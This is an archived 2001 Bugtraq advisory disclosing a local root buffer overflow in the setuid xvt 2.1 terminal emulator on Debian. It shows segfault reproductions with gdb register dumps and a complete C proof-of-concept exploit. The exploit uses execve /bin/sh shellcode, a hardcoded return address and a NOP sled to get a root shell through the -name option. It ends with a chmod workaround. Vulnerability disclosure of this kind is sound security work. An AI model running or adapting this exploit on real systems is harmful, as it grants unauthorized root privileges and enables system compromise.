6696053 2001-07-02 16:01 +0200 /183 rader/ BAILLEUX Christophe <cb@t-online.fr>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-02 18:47 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17738>
Kommentar till text 6627929 av Samuel Dralet <samuel.dralet@mastersecurity.fr>
Ärende: Xvt 2.1 vulnerability
------------------------------------------------------------
From: BAILLEUX Christophe <cb@t-online.fr>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.21.0107021553380.18326-100000@tshaw.grolier.fr>
Package: xvt
Version: 2.1
Problem type: Local root vulnerability
Linux distribution: only tested on Debian
----] Introduction
xvt is an X terminal-emulator that is designed to be more or less
compatible with xterm while using much less swap space. It is mainly
intended for use at sites which use large numbers of X terminals but
may also be useful on single workstations that are short of
memory. The main way that xvt achieves its small size is by avoiding
the use of the X toolkit.
http://packages.debian.org/stable/x11/xvt.html
---] Problems
After the security advisory about rxvt by Samuel Dralet
(samuel.dralet@mastersecurity.fr), I discovered that xvt has some
possible buffer overrun conditions related to passing large arguments
to xvt's -T and -name command-line options. Sice xvt is installed
setuid root by default, it was possible for a normal user to pass
carefully-crafted arguments to xvt such that xvt executed a root
shell.
Debian Security Team has been informed.
----] Demo
$ ls -l /usr/bin/X11/xvt
-rwsr-xr-x 1 root root 50288 Mar 26 2000 /usr/bin/X11/xvt
$ xvt -V
xvt version 2.1
A) xvt -name <buffer>
$ xvt -name `perl -e 'print "A"x234'`
Segmentation fault (core dumped)
$
tshaw:~$ gdb --core core
GNU gdb 5.0
<snip>
Core was generated by `xvt -name
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb)
B) xvt -T <buffer>
$ xvt -T `perl -e 'print "A"x262'`
Segmentation fault (core dumped)
$
$ gdb --core core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
<snip>
Core was generated by `xvt -T
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x804b043 in ?? ()
(gdb) where
#0 0x804b043 in ?? ()
#1 0x804c075 in ?? ()
#2 0x804b4f6 in ?? ()
#3 0x804a19c in ?? ()
(gdb) info reg
eax 0x8004100 134234368
ecx 0xffffffff -1
edx 0x805524f 134566479
ebx 0x8055148 134566216
esp 0xbfffdea0 0xbfffdea0
ebp 0xbfffdeac 0xbfffdeac
esi 0x8004141 134234433
edi 0x8004141 134234433
eip 0x804b043 0x804b043
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x2b 43
gs 0x2b 43
fctrl 0x0 0
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
(gdb)
----] proof of exploited code
--- expl.c ---
/*
/usr/bin/X11/xvt overflow proof of concept by cb@t-online.fr.
tshaw:~$ ./expl
bash#
*/
#include <stdio.h>
#include <stdlib.h>
int main()
{
char buf[234];
int i;
char code[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
for(i=0; i<76; i++)
buf[i] = 0x41;
*(long *)&buf[76]=0xbffffab0; /* ret addr */
memset(buf + 80, 0x90, 234);
memcpy(buf + 233 - strlen(code), code, strlen(code));
buf[234] = '\0';
execl("/usr/bin/X11/xvt", "xvt", "-name", buf, 0);
}
--- expl.c ---
----] Workaround
# chmod u-s /usr/bin/X11/xvt
----] Greetings
Samuel Dralet samuel.dralet@mastersecurity.fr
Tufqi tuf@mmania.com
--
Christophe Bailleux - Network & System Security Engineer
Club-Internet / T-Online France
Voice:+33-(0)1-5545-4789 - mailto:cb@t-online.fr
(6696053) /BAILLEUX Christophe <cb@t-online.fr>/(Ombruten)